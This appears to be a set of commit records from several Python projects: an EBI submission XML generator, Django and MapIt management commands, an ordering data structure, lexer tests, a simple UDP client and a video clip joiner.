investigation_type, sample_template, prep_templates, fastq_dir)
# Get study-specific output directory and set filepaths
get_output_fp = partial(join, output_dir)
study_fp = get_output_fp('study.xml')
sample_fp = get_output_fp('sample.xml')
experiment_fp = get_output_fp('experiment.xml')
run_fp = get_output_fp('run.xml')
submission_fp = get_output_fp('submission.xml')
submission.write_all_xml_files(study_fp, sample_fp, experiment_fp, run_fp,
submission_fp, action)
for prep_template in prep_templates:
prep_template.close()
|
Add library code for ebi functions# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from os.path import join
from os import makedirs
from functools import partial
from qiita_db.study import Study
from qiita_db.metadata_template import PrepTemplate, SampleTemplate
from qiita_ware.ebi import EBISubmission
def generate(study_id, output_dir, action, investigation_type):
# Get study information from database
study_id_str = str(study_id)
study = Study(study_id)
submission = EBISubmission(study_id_str, study.title,
study.info['study_abstract'],
investigation_type)
# Get study-specific output directory and set filepaths
get_output_fp = partial(join, output_dir)
study_fp = get_output_fp('study.xml')
sample_fp = get_output_fp('sample.xml')
experiment_fp = get_output_fp('experiment.xml')
run_fp = get_output_fp('run.xml')
submission_fp = get_output_fp('submission.xml')
sample_template_fp = get_output_fp('sample_template.tsv')
sample_template = SampleTemplate(study.sample_template)
sample_template.to_file(sample_template_fp)
submission.write_all_xml_files(study_fp, sample_fp, experiment_fp, run_fp,
submission_fp, action)
def generate_from_files(study_id, sample_template, prep_template_fps,
fastq_dir, investigation_type, output_dir):
study = Study(study_id)
study_id_str = str(study_id)
prep_templates = [open(prep_template_fp)
for prep_template_fp in prep_template_fps]
submission = from_templates_and_per_sample_fastqs(
study_id_str, study.title, study.info['study_abstract'],
investigation_type, sample_template, prep_templates, fastq_dir)
# Get study-specific output directory and set filepaths
get_output_fp = partial(join, output_dir)
study_fp = get_output_fp('study.xml')
sample_fp = get_output_fp('sample.xml')
experiment_fp = get_output_fp('experiment.xml')
run_fp = get_output_fp('run.xml')
submission_fp = get_output_fp('submission.xml')
submission.write_all_xml_files(study_fp, sample_fp, experiment_fp, run_fp,
submission_fp, action)
for prep_template in prep_templates:
prep_template.close()
|
<commit_before><commit_msg>Add library code for ebi functions<commit_after># -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from os.path import join
from os import makedirs
from functools import partial
from qiita_db.study import Study
from qiita_db.metadata_template import PrepTemplate, SampleTemplate
from qiita_ware.ebi import EBISubmission
def generate(study_id, output_dir, action, investigation_type):
# Get study information from database
study_id_str = str(study_id)
study = Study(study_id)
submission = EBISubmission(study_id_str, study.title,
study.info['study_abstract'],
investigation_type)
# Get study-specific output directory and set filepaths
get_output_fp = partial(join, output_dir)
study_fp = get_output_fp('study.xml')
sample_fp = get_output_fp('sample.xml')
experiment_fp = get_output_fp('experiment.xml')
run_fp = get_output_fp('run.xml')
submission_fp = get_output_fp('submission.xml')
sample_template_fp = get_output_fp('sample_template.tsv')
sample_template = SampleTemplate(study.sample_template)
sample_template.to_file(sample_template_fp)
submission.write_all_xml_files(study_fp, sample_fp, experiment_fp, run_fp,
submission_fp, action)
def generate_from_files(study_id, sample_template, prep_template_fps,
fastq_dir, investigation_type, output_dir):
study = Study(study_id)
study_id_str = str(study_id)
prep_templates = [open(prep_template_fp)
for prep_template_fp in prep_template_fps]
submission = from_templates_and_per_sample_fastqs(
study_id_str, study.title, study.info['study_abstract'],
investigation_type, sample_template, prep_templates, fastq_dir)
# Get study-specific output directory and set filepaths
get_output_fp = partial(join, output_dir)
study_fp = get_output_fp('study.xml')
sample_fp = get_output_fp('sample.xml')
experiment_fp = get_output_fp('experiment.xml')
run_fp = get_output_fp('run.xml')
submission_fp = get_output_fp('submission.xml')
submission.write_all_xml_files(study_fp, sample_fp, experiment_fp, run_fp,
submission_fp, action)
for prep_template in prep_templates:
prep_template.close()
|
|
7589f2364a73d75711b596ce8ab9581986bd4129
|
radio/management/commands/set_default_access_tg.py
|
radio/management/commands/set_default_access_tg.py
|
import sys
import datetime
import csv
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from django.utils import timezone
from radio.models import *
class Command(BaseCommand):
help = 'Helper for new TalkGroup Access'
def add_arguments(self, parser):
parser.add_argument('access_group_name')
def handle(self, *args, **options):
access_menu(self, options)
def access_menu(self, options):
try:
access_gp = TalkGroupAccess.objects.get(name=options['access_group_name'])
except TalkGroupAccess.DoesNotExist:
self.stdout.write(self.style.ERROR('Talk Group Access List [{}] does not exist, check case and spelling'.format(options['access_group_name'])))
all_access_names = TalkGroupAccess.objects.all()
if all_access_names:
self.stdout.write('Current Talk Group Access lists in the database:')
for tg in all_access_names:
self.stdout.write(tg.name)
else:
self.stdout.write(self.style.ERROR('**There are no Talk Group Access lists in the database'))
return
self.stdout.write('Setting all current public Talk Groups into {}'.format(access_gp.name))
ct=0
for tg in TalkGroupWithSystem.objects.filter(public=True):
access_gp.talkgroups.add(tg)
ct += 1
self.stdout.write(self.style.SUCCESS('Added {} TalkGroups to Talk Group Access List - {}'.format(ct, access_gp.name)))
|
Add utility to setup TalkGroupAccess talkgroups
|
Add utility to setup TalkGroupAccess talkgroups
The utility will add all TalkGroups that are marked as public into the specivied specified TalkGroup Access list
|
Python
|
mit
|
ScanOC/trunk-player,ScanOC/trunk-player,ScanOC/trunk-player,ScanOC/trunk-player
|
Add utility to setup TalkGroupAccess talkgroups
The utility will add all TalkGroups that are marked as public into the specivied specified TalkGroup Access list
|
import sys
import datetime
import csv
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from django.utils import timezone
from radio.models import *
class Command(BaseCommand):
help = 'Helper for new TalkGroup Access'
def add_arguments(self, parser):
parser.add_argument('access_group_name')
def handle(self, *args, **options):
access_menu(self, options)
def access_menu(self, options):
try:
access_gp = TalkGroupAccess.objects.get(name=options['access_group_name'])
except TalkGroupAccess.DoesNotExist:
self.stdout.write(self.style.ERROR('Talk Group Access List [{}] does not exist, check case and spelling'.format(options['access_group_name'])))
all_access_names = TalkGroupAccess.objects.all()
if all_access_names:
self.stdout.write('Current Talk Group Access lists in the database:')
for tg in all_access_names:
self.stdout.write(tg.name)
else:
self.stdout.write(self.style.ERROR('**There are no Talk Group Access lists in the database'))
return
self.stdout.write('Setting all current public Talk Groups into {}'.format(access_gp.name))
ct=0
for tg in TalkGroupWithSystem.objects.filter(public=True):
access_gp.talkgroups.add(tg)
ct += 1
self.stdout.write(self.style.SUCCESS('Added {} TalkGroups to Talk Group Access List - {}'.format(ct, access_gp.name)))
|
<commit_before><commit_msg>Add utility to setup TalkGroupAccess talkgroups
The utility will add all TalkGroups that are marked as public into the specivied specified TalkGroup Access list<commit_after>
|
import sys
import datetime
import csv
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from django.utils import timezone
from radio.models import *
class Command(BaseCommand):
help = 'Helper for new TalkGroup Access'
def add_arguments(self, parser):
parser.add_argument('access_group_name')
def handle(self, *args, **options):
access_menu(self, options)
def access_menu(self, options):
try:
access_gp = TalkGroupAccess.objects.get(name=options['access_group_name'])
except TalkGroupAccess.DoesNotExist:
self.stdout.write(self.style.ERROR('Talk Group Access List [{}] does not exist, check case and spelling'.format(options['access_group_name'])))
all_access_names = TalkGroupAccess.objects.all()
if all_access_names:
self.stdout.write('Current Talk Group Access lists in the database:')
for tg in all_access_names:
self.stdout.write(tg.name)
else:
self.stdout.write(self.style.ERROR('**There are no Talk Group Access lists in the database'))
return
self.stdout.write('Setting all current public Talk Groups into {}'.format(access_gp.name))
ct=0
for tg in TalkGroupWithSystem.objects.filter(public=True):
access_gp.talkgroups.add(tg)
ct += 1
self.stdout.write(self.style.SUCCESS('Added {} TalkGroups to Talk Group Access List - {}'.format(ct, access_gp.name)))
|
Add utility to setup TalkGroupAccess talkgroups
The utility will add all TalkGroups that are marked as public into the specivied specified TalkGroup Access listimport sys
import datetime
import csv
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from django.utils import timezone
from radio.models import *
class Command(BaseCommand):
help = 'Helper for new TalkGroup Access'
def add_arguments(self, parser):
parser.add_argument('access_group_name')
def handle(self, *args, **options):
access_menu(self, options)
def access_menu(self, options):
try:
access_gp = TalkGroupAccess.objects.get(name=options['access_group_name'])
except TalkGroupAccess.DoesNotExist:
self.stdout.write(self.style.ERROR('Talk Group Access List [{}] does not exist, check case and spelling'.format(options['access_group_name'])))
all_access_names = TalkGroupAccess.objects.all()
if all_access_names:
self.stdout.write('Current Talk Group Access lists in the database:')
for tg in all_access_names:
self.stdout.write(tg.name)
else:
self.stdout.write(self.style.ERROR('**There are no Talk Group Access lists in the database'))
return
self.stdout.write('Setting all current public Talk Groups into {}'.format(access_gp.name))
ct=0
for tg in TalkGroupWithSystem.objects.filter(public=True):
access_gp.talkgroups.add(tg)
ct += 1
self.stdout.write(self.style.SUCCESS('Added {} TalkGroups to Talk Group Access List - {}'.format(ct, access_gp.name)))
|
<commit_before><commit_msg>Add utility to setup TalkGroupAccess talkgroups
The utility will add all TalkGroups that are marked as public into the specivied specified TalkGroup Access list<commit_after>import sys
import datetime
import csv
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from django.utils import timezone
from radio.models import *
class Command(BaseCommand):
help = 'Helper for new TalkGroup Access'
def add_arguments(self, parser):
parser.add_argument('access_group_name')
def handle(self, *args, **options):
access_menu(self, options)
def access_menu(self, options):
try:
access_gp = TalkGroupAccess.objects.get(name=options['access_group_name'])
except TalkGroupAccess.DoesNotExist:
self.stdout.write(self.style.ERROR('Talk Group Access List [{}] does not exist, check case and spelling'.format(options['access_group_name'])))
all_access_names = TalkGroupAccess.objects.all()
if all_access_names:
self.stdout.write('Current Talk Group Access lists in the database:')
for tg in all_access_names:
self.stdout.write(tg.name)
else:
self.stdout.write(self.style.ERROR('**There are no Talk Group Access lists in the database'))
return
self.stdout.write('Setting all current public Talk Groups into {}'.format(access_gp.name))
ct=0
for tg in TalkGroupWithSystem.objects.filter(public=True):
access_gp.talkgroups.add(tg)
ct += 1
self.stdout.write(self.style.SUCCESS('Added {} TalkGroups to Talk Group Access List - {}'.format(ct, access_gp.name)))
|
|
b0783691bc0855ad154b649ddfabe7572f79f7fd
|
ordering/__init__.py
|
ordering/__init__.py
|
from fractions import Fraction
class Ordering:
_start = object()
_end = object()
def __init__(self):
self._labels = {
self._start: Fraction(0),
self._end: Fraction(1)
}
self._successors = {
self._start: self._end
}
self._predecessors = {
self._end: self._start
}
def insert_after(self, existing_item, new_item):
self._labels[new_item] = (self._labels[existing_item] + self._labels[self._successors[existing_item]]) / 2
self._successors[new_item] = self._successors[existing_item]
self._predecessors[new_item] = existing_item
self._predecessors[self._successors[existing_item]] = new_item
self._successors[existing_item] = new_item
def insert_before(self, existing_item, new_item):
self.insert_after(self._predecessors[existing_item], new_item)
def insert_start(self, new_item):
self.insert_after(self._start, new_item)
def insert_end(self, new_item):
self.insert_before(self._end, new_item)
def compare(self, left_item, right_item):
return self._labels[left_item] < self._labels[right_item]
|
Add class representing an ordering on elements
|
Add class representing an ordering on elements
|
Python
|
mit
|
madman-bob/python-order-maintenance
|
Add class representing an ordering on elements
|
from fractions import Fraction
class Ordering:
_start = object()
_end = object()
def __init__(self):
self._labels = {
self._start: Fraction(0),
self._end: Fraction(1)
}
self._successors = {
self._start: self._end
}
self._predecessors = {
self._end: self._start
}
def insert_after(self, existing_item, new_item):
self._labels[new_item] = (self._labels[existing_item] + self._labels[self._successors[existing_item]]) / 2
self._successors[new_item] = self._successors[existing_item]
self._predecessors[new_item] = existing_item
self._predecessors[self._successors[existing_item]] = new_item
self._successors[existing_item] = new_item
def insert_before(self, existing_item, new_item):
self.insert_after(self._predecessors[existing_item], new_item)
def insert_start(self, new_item):
self.insert_after(self._start, new_item)
def insert_end(self, new_item):
self.insert_before(self._end, new_item)
def compare(self, left_item, right_item):
return self._labels[left_item] < self._labels[right_item]
|
<commit_before><commit_msg>Add class representing an ordering on elements<commit_after>
|
from fractions import Fraction
class Ordering:
_start = object()
_end = object()
def __init__(self):
self._labels = {
self._start: Fraction(0),
self._end: Fraction(1)
}
self._successors = {
self._start: self._end
}
self._predecessors = {
self._end: self._start
}
def insert_after(self, existing_item, new_item):
self._labels[new_item] = (self._labels[existing_item] + self._labels[self._successors[existing_item]]) / 2
self._successors[new_item] = self._successors[existing_item]
self._predecessors[new_item] = existing_item
self._predecessors[self._successors[existing_item]] = new_item
self._successors[existing_item] = new_item
def insert_before(self, existing_item, new_item):
self.insert_after(self._predecessors[existing_item], new_item)
def insert_start(self, new_item):
self.insert_after(self._start, new_item)
def insert_end(self, new_item):
self.insert_before(self._end, new_item)
def compare(self, left_item, right_item):
return self._labels[left_item] < self._labels[right_item]
|
Add class representing an ordering on elementsfrom fractions import Fraction
class Ordering:
_start = object()
_end = object()
def __init__(self):
self._labels = {
self._start: Fraction(0),
self._end: Fraction(1)
}
self._successors = {
self._start: self._end
}
self._predecessors = {
self._end: self._start
}
def insert_after(self, existing_item, new_item):
self._labels[new_item] = (self._labels[existing_item] + self._labels[self._successors[existing_item]]) / 2
self._successors[new_item] = self._successors[existing_item]
self._predecessors[new_item] = existing_item
self._predecessors[self._successors[existing_item]] = new_item
self._successors[existing_item] = new_item
def insert_before(self, existing_item, new_item):
self.insert_after(self._predecessors[existing_item], new_item)
def insert_start(self, new_item):
self.insert_after(self._start, new_item)
def insert_end(self, new_item):
self.insert_before(self._end, new_item)
def compare(self, left_item, right_item):
return self._labels[left_item] < self._labels[right_item]
|
<commit_before><commit_msg>Add class representing an ordering on elements<commit_after>from fractions import Fraction
class Ordering:
_start = object()
_end = object()
def __init__(self):
self._labels = {
self._start: Fraction(0),
self._end: Fraction(1)
}
self._successors = {
self._start: self._end
}
self._predecessors = {
self._end: self._start
}
def insert_after(self, existing_item, new_item):
self._labels[new_item] = (self._labels[existing_item] + self._labels[self._successors[existing_item]]) / 2
self._successors[new_item] = self._successors[existing_item]
self._predecessors[new_item] = existing_item
self._predecessors[self._successors[existing_item]] = new_item
self._successors[existing_item] = new_item
def insert_before(self, existing_item, new_item):
self.insert_after(self._predecessors[existing_item], new_item)
def insert_start(self, new_item):
self.insert_after(self._start, new_item)
def insert_end(self, new_item):
self.insert_before(self._end, new_item)
def compare(self, left_item, right_item):
return self._labels[left_item] < self._labels[right_item]
|
|
ff4f9810e3cccf89858f62bf1e6a3d060f7168ad
|
mapit/management/commands/mapit_UK_fix_2013-10-south-tynedale.py
|
mapit/management/commands/mapit_UK_fix_2013-10-south-tynedale.py
|
# This script is to be run as a one-off to fix up a specific boundary that
# the Ordnance survey gave the wrong code too in the 2013-10 edition of the
# boundary line. It must be run *before* importing the 2014-05 edition.
from optparse import make_option
from django.core.management.base import NoArgsCommand
from django.contrib.gis.gdal import *
from mapit.models import Area, CodeType
class Command(NoArgsCommand):
help = 'Fix the GSS code of UTE South Tynedale so that we can import the May 2014 boundary line'
option_list = NoArgsCommand.option_list + (
make_option('--commit', action='store_true', dest='commit', help='Actually update the database'),
)
def handle_noargs(self, **options):
code_version = CodeType.objects.get(code='gss')
# We need to remove the code E05009154 from the South Tynedale area
# (which lived in MapIt UK's database from generations 1 - 20)
# so that when we add it back in during the May 2014 import
# (MapIt UK's generation 22), we don't get an error from the
# boundary-line import script. Only one area should have this code at
# any given time, they can't both share it.
area = Area.objects.get(codes__code='E05009154', codes__type=code_version)
if options['commit']:
area.codes.get(code='E05009154', type=code_version).delete()
|
Add a command to fix South Tynedale's GSS code from 2013-10
|
Add a command to fix South Tynedale's GSS code from 2013-10
South Tynedale UTE was given the wrong GSS code in the last Ordnance
Survey boundary line update in November 2013. They corrected this in
the May 2014 edition, but we need to fix up our historical version of
the area in order to be able to import that.
|
Python
|
agpl-3.0
|
chris48s/mapit,Sinar/mapit,opencorato/mapit,chris48s/mapit,opencorato/mapit,Code4SA/mapit,opencorato/mapit,chris48s/mapit,Code4SA/mapit,Sinar/mapit,Code4SA/mapit
|
Add a command to fix South Tynedale's GSS code from 2013-10
South Tynedale UTE was given the wrong GSS code in the last Ordnance
Survey boundary line update in November 2013. They corrected this in
the May 2014 edition, but we need to fix up our historical version of
the area in order to be able to import that.
|
# This script is to be run as a one-off to fix up a specific boundary that
# the Ordnance survey gave the wrong code too in the 2013-10 edition of the
# boundary line. It must be run *before* importing the 2014-05 edition.
from optparse import make_option
from django.core.management.base import NoArgsCommand
from django.contrib.gis.gdal import *
from mapit.models import Area, CodeType
class Command(NoArgsCommand):
help = 'Fix the GSS code of UTE South Tynedale so that we can import the May 2014 boundary line'
option_list = NoArgsCommand.option_list + (
make_option('--commit', action='store_true', dest='commit', help='Actually update the database'),
)
def handle_noargs(self, **options):
code_version = CodeType.objects.get(code='gss')
# We need to remove the code E05009154 from the South Tynedale area
# (which lived in MapIt UK's database from generations 1 - 20)
# so that when we add it back in during the May 2014 import
# (MapIt UK's generation 22), we don't get an error from the
# boundary-line import script. Only one area should have this code at
# any given time, they can't both share it.
area = Area.objects.get(codes__code='E05009154', codes__type=code_version)
if options['commit']:
area.codes.get(code='E05009154', type=code_version).delete()
|
<commit_before><commit_msg>Add a command to fix South Tynedale's GSS code from 2013-10
South Tynedale UTE was given the wrong GSS code in the last Ordnance
Survey boundary line update in November 2013. They corrected this in
the May 2014 edition, but we need to fix up our historical version of
the area in order to be able to import that.<commit_after>
|
# This script is to be run as a one-off to fix up a specific boundary that
# the Ordnance survey gave the wrong code too in the 2013-10 edition of the
# boundary line. It must be run *before* importing the 2014-05 edition.
from optparse import make_option
from django.core.management.base import NoArgsCommand
from django.contrib.gis.gdal import *
from mapit.models import Area, CodeType
class Command(NoArgsCommand):
help = 'Fix the GSS code of UTE South Tynedale so that we can import the May 2014 boundary line'
option_list = NoArgsCommand.option_list + (
make_option('--commit', action='store_true', dest='commit', help='Actually update the database'),
)
def handle_noargs(self, **options):
code_version = CodeType.objects.get(code='gss')
# We need to remove the code E05009154 from the South Tynedale area
# (which lived in MapIt UK's database from generations 1 - 20)
# so that when we add it back in during the May 2014 import
# (MapIt UK's generation 22), we don't get an error from the
# boundary-line import script. Only one area should have this code at
# any given time, they can't both share it.
area = Area.objects.get(codes__code='E05009154', codes__type=code_version)
if options['commit']:
area.codes.get(code='E05009154', type=code_version).delete()
|
Add a command to fix South Tynedale's GSS code from 2013-10
South Tynedale UTE was given the wrong GSS code in the last Ordnance
Survey boundary line update in November 2013. They corrected this in
the May 2014 edition, but we need to fix up our historical version of
the area in order to be able to import that.# This script is to be run as a one-off to fix up a specific boundary that
# the Ordnance survey gave the wrong code too in the 2013-10 edition of the
# boundary line. It must be run *before* importing the 2014-05 edition.
from optparse import make_option
from django.core.management.base import NoArgsCommand
from django.contrib.gis.gdal import *
from mapit.models import Area, CodeType
class Command(NoArgsCommand):
help = 'Fix the GSS code of UTE South Tynedale so that we can import the May 2014 boundary line'
option_list = NoArgsCommand.option_list + (
make_option('--commit', action='store_true', dest='commit', help='Actually update the database'),
)
def handle_noargs(self, **options):
code_version = CodeType.objects.get(code='gss')
# We need to remove the code E05009154 from the South Tynedale area
# (which lived in MapIt UK's database from generations 1 - 20)
# so that when we add it back in during the May 2014 import
# (MapIt UK's generation 22), we don't get an error from the
# boundary-line import script. Only one area should have this code at
# any given time, they can't both share it.
area = Area.objects.get(codes__code='E05009154', codes__type=code_version)
if options['commit']:
area.codes.get(code='E05009154', type=code_version).delete()
|
<commit_before><commit_msg>Add a command to fix South Tynedale's GSS code from 2013-10
South Tynedale UTE was given the wrong GSS code in the last Ordnance
Survey boundary line update in November 2013. They corrected this in
the May 2014 edition, but we need to fix up our historical version of
the area in order to be able to import that.<commit_after># This script is to be run as a one-off to fix up a specific boundary that
# the Ordnance survey gave the wrong code too in the 2013-10 edition of the
# boundary line. It must be run *before* importing the 2014-05 edition.
from optparse import make_option
from django.core.management.base import NoArgsCommand
from django.contrib.gis.gdal import *
from mapit.models import Area, CodeType
class Command(NoArgsCommand):
help = 'Fix the GSS code of UTE South Tynedale so that we can import the May 2014 boundary line'
option_list = NoArgsCommand.option_list + (
make_option('--commit', action='store_true', dest='commit', help='Actually update the database'),
)
def handle_noargs(self, **options):
code_version = CodeType.objects.get(code='gss')
# We need to remove the code E05009154 from the South Tynedale area
# (which lived in MapIt UK's database from generations 1 - 20)
# so that when we add it back in during the May 2014 import
# (MapIt UK's generation 22), we don't get an error from the
# boundary-line import script. Only one area should have this code at
# any given time, they can't both share it.
area = Area.objects.get(codes__code='E05009154', codes__type=code_version)
if options['commit']:
area.codes.get(code='E05009154', type=code_version).delete()
|
|
40438912639ea20614b7957443450463f6519c0b
|
clusto_query/test/test_lexer.py
|
clusto_query/test/test_lexer.py
|
import unittest
import clusto_query.lexer
class LexerTest(unittest.TestCase):
def test_consume(self):
self.assertEqual(clusto_query.lexer.consume('nom', 'nomnomnom'),
'nomnom')
def test_lex_string_inner_quoted_basic(self):
self.assertEqual(clusto_query.lexer.lex_string_inner("'production' and"),
('production', False, ' and'))
self.assertEqual(clusto_query.lexer.lex_string_inner('"production" and'),
('production', False, ' and'))
def test_lex_string_inner_quoted_with_spaces(self):
self.assertEqual(clusto_query.lexer.lex_string_inner("' prod uction ' and"),
(' prod uction ', False, ' and'))
self.assertEqual(clusto_query.lexer.lex_string_inner('" prod uction " and'),
(' prod uction ', False, ' and'))
def test_lex_string_inner_unquoted(self):
self.assertEqual(clusto_query.lexer.lex_string_inner('1 and'),
('1', True, ' and'))
|
Add some tests for lexer.py
|
Add some tests for lexer.py
|
Python
|
isc
|
uber/clusto-query,uber/clusto-query
|
Add some tests for lexer.py
|
import unittest
import clusto_query.lexer
class LexerTest(unittest.TestCase):
def test_consume(self):
self.assertEqual(clusto_query.lexer.consume('nom', 'nomnomnom'),
'nomnom')
def test_lex_string_inner_quoted_basic(self):
self.assertEqual(clusto_query.lexer.lex_string_inner("'production' and"),
('production', False, ' and'))
self.assertEqual(clusto_query.lexer.lex_string_inner('"production" and'),
('production', False, ' and'))
def test_lex_string_inner_quoted_with_spaces(self):
self.assertEqual(clusto_query.lexer.lex_string_inner("' prod uction ' and"),
(' prod uction ', False, ' and'))
self.assertEqual(clusto_query.lexer.lex_string_inner('" prod uction " and'),
(' prod uction ', False, ' and'))
def test_lex_string_inner_unquoted(self):
self.assertEqual(clusto_query.lexer.lex_string_inner('1 and'),
('1', True, ' and'))
|
<commit_before><commit_msg>Add some tests for lexer.py<commit_after>
|
import unittest
import clusto_query.lexer
class LexerTest(unittest.TestCase):
def test_consume(self):
self.assertEqual(clusto_query.lexer.consume('nom', 'nomnomnom'),
'nomnom')
def test_lex_string_inner_quoted_basic(self):
self.assertEqual(clusto_query.lexer.lex_string_inner("'production' and"),
('production', False, ' and'))
self.assertEqual(clusto_query.lexer.lex_string_inner('"production" and'),
('production', False, ' and'))
def test_lex_string_inner_quoted_with_spaces(self):
self.assertEqual(clusto_query.lexer.lex_string_inner("' prod uction ' and"),
(' prod uction ', False, ' and'))
self.assertEqual(clusto_query.lexer.lex_string_inner('" prod uction " and'),
(' prod uction ', False, ' and'))
def test_lex_string_inner_unquoted(self):
self.assertEqual(clusto_query.lexer.lex_string_inner('1 and'),
('1', True, ' and'))
|
Add some tests for lexer.pyimport unittest
import clusto_query.lexer
class LexerTest(unittest.TestCase):
def test_consume(self):
self.assertEqual(clusto_query.lexer.consume('nom', 'nomnomnom'),
'nomnom')
def test_lex_string_inner_quoted_basic(self):
self.assertEqual(clusto_query.lexer.lex_string_inner("'production' and"),
('production', False, ' and'))
self.assertEqual(clusto_query.lexer.lex_string_inner('"production" and'),
('production', False, ' and'))
def test_lex_string_inner_quoted_with_spaces(self):
self.assertEqual(clusto_query.lexer.lex_string_inner("' prod uction ' and"),
(' prod uction ', False, ' and'))
self.assertEqual(clusto_query.lexer.lex_string_inner('" prod uction " and'),
(' prod uction ', False, ' and'))
def test_lex_string_inner_unquoted(self):
self.assertEqual(clusto_query.lexer.lex_string_inner('1 and'),
('1', True, ' and'))
|
<commit_before><commit_msg>Add some tests for lexer.py<commit_after>import unittest
import clusto_query.lexer
class LexerTest(unittest.TestCase):
def test_consume(self):
self.assertEqual(clusto_query.lexer.consume('nom', 'nomnomnom'),
'nomnom')
def test_lex_string_inner_quoted_basic(self):
self.assertEqual(clusto_query.lexer.lex_string_inner("'production' and"),
('production', False, ' and'))
self.assertEqual(clusto_query.lexer.lex_string_inner('"production" and'),
('production', False, ' and'))
def test_lex_string_inner_quoted_with_spaces(self):
self.assertEqual(clusto_query.lexer.lex_string_inner("' prod uction ' and"),
(' prod uction ', False, ' and'))
self.assertEqual(clusto_query.lexer.lex_string_inner('" prod uction " and'),
(' prod uction ', False, ' and'))
def test_lex_string_inner_unquoted(self):
self.assertEqual(clusto_query.lexer.lex_string_inner('1 and'),
('1', True, ' and'))
|
|
4d5c9066b9fba17cd484ecfafc646989e4828a87
|
connectionless_client_2.py
|
connectionless_client_2.py
|
"""
A simple connectionless client. It is for studying purposes only.
"""
import socket
__author__ = "Facundo Victor"
__license__ = "MIT"
__email__ = "facundovt@gmail.com"
def do_some_messaging(host, port):
"""
Handle a simple UDP client. Ask for stdinput data and send it to the UDP
server.
:param host: Name or IP address of the destination server.
:ptype: String or Integer (see help(socket))
:param port: The transport layer identifier of an application
:ptype: Integer
"""
server = (host, port)
while True:
data = raw_input('Please enter data to send:\n')
if data.strip() == 'exit':
return
print('Sending a data to the server')
sock.sendto(data, server)
(new_data, server_address) = sock.recvfrom(1024)
print('Received data: %s' % (new_data))
"""
Take in mind that the connect only stores the host and the port, it does not
establishes any connection.
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
do_some_messaging("localhost", 8888)
sock.close()
|
Add a basic UDP client
|
Add a basic UDP client
|
Python
|
mit
|
facundovictor/non-blocking-socket-samples
|
Add a basic UDP client
|
"""
A simple connectionless client. It is for studying purposes only.
"""
import socket
__author__ = "Facundo Victor"
__license__ = "MIT"
__email__ = "facundovt@gmail.com"
def do_some_messaging(host, port):
"""
Handle a simple UDP client. Ask for stdinput data and send it to the UDP
server.
:param host: Name or IP address of the destination server.
:ptype: String or Integer (see help(socket))
:param port: The transport layer identifier of an application
:ptype: Integer
"""
server = (host, port)
while True:
data = raw_input('Please enter data to send:\n')
if data.strip() == 'exit':
return
print('Sending a data to the server')
sock.sendto(data, server)
(new_data, server_address) = sock.recvfrom(1024)
print('Received data: %s' % (new_data))
"""
Take in mind that the connect only stores the host and the port, it does not
establishes any connection.
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
do_some_messaging("localhost", 8888)
sock.close()
|
<commit_before><commit_msg>Add a basic UDP client<commit_after>
|
"""
A simple connectionless client. It is for studying purposes only.
"""
import socket
__author__ = "Facundo Victor"
__license__ = "MIT"
__email__ = "facundovt@gmail.com"
def do_some_messaging(host, port):
"""
Handle a simple UDP client. Ask for stdinput data and send it to the UDP
server.
:param host: Name or IP address of the destination server.
:ptype: String or Integer (see help(socket))
:param port: The transport layer identifier of an application
:ptype: Integer
"""
server = (host, port)
while True:
data = raw_input('Please enter data to send:\n')
if data.strip() == 'exit':
return
print('Sending a data to the server')
sock.sendto(data, server)
(new_data, server_address) = sock.recvfrom(1024)
print('Received data: %s' % (new_data))
"""
Take in mind that the connect only stores the host and the port, it does not
establishes any connection.
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
do_some_messaging("localhost", 8888)
sock.close()
|
Add a basic UDP client"""
A simple connectionless client. It is for studying purposes only.
"""
import socket
__author__ = "Facundo Victor"
__license__ = "MIT"
__email__ = "facundovt@gmail.com"
def do_some_messaging(host, port):
"""
Handle a simple UDP client. Ask for stdinput data and send it to the UDP
server.
:param host: Name or IP address of the destination server.
:ptype: String or Integer (see help(socket))
:param port: The transport layer identifier of an application
:ptype: Integer
"""
server = (host, port)
while True:
data = raw_input('Please enter data to send:\n')
if data.strip() == 'exit':
return
print('Sending a data to the server')
sock.sendto(data, server)
(new_data, server_address) = sock.recvfrom(1024)
print('Received data: %s' % (new_data))
"""
Take in mind that the connect only stores the host and the port, it does not
establishes any connection.
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
do_some_messaging("localhost", 8888)
sock.close()
|
<commit_before><commit_msg>Add a basic UDP client<commit_after>"""
A simple connectionless client. It is for studying purposes only.
"""
import socket
__author__ = "Facundo Victor"
__license__ = "MIT"
__email__ = "facundovt@gmail.com"
def do_some_messaging(host, port):
"""
Handle a simple UDP client. Ask for stdinput data and send it to the UDP
server.
:param host: Name or IP address of the destination server.
:ptype: String or Integer (see help(socket))
:param port: The transport layer identifier of an application
:ptype: Integer
"""
server = (host, port)
while True:
data = raw_input('Please enter data to send:\n')
if data.strip() == 'exit':
return
print('Sending a data to the server')
sock.sendto(data, server)
(new_data, server_address) = sock.recvfrom(1024)
print('Received data: %s' % (new_data))
"""
Take in mind that the connect only stores the host and the port, it does not
establishes any connection.
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
do_some_messaging("localhost", 8888)
sock.close()
|
|
5da2c5406daf31cb4f0c310abd56c1173609c549
|
join_clips.py
|
join_clips.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from moviepy.editor import VideoFileClip, clips_array
import argparse
def main(args):
print(args)
clips = map(VideoFileClip, args.file)
final_clip = clips_array([clips])
final_clip.write_videofile(args.output, fps=15)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-o', '--output', required=True)
parser.add_argument('file', nargs='+')
main(parser.parse_args())
|
Add script to create single movie file from others horizontally
|
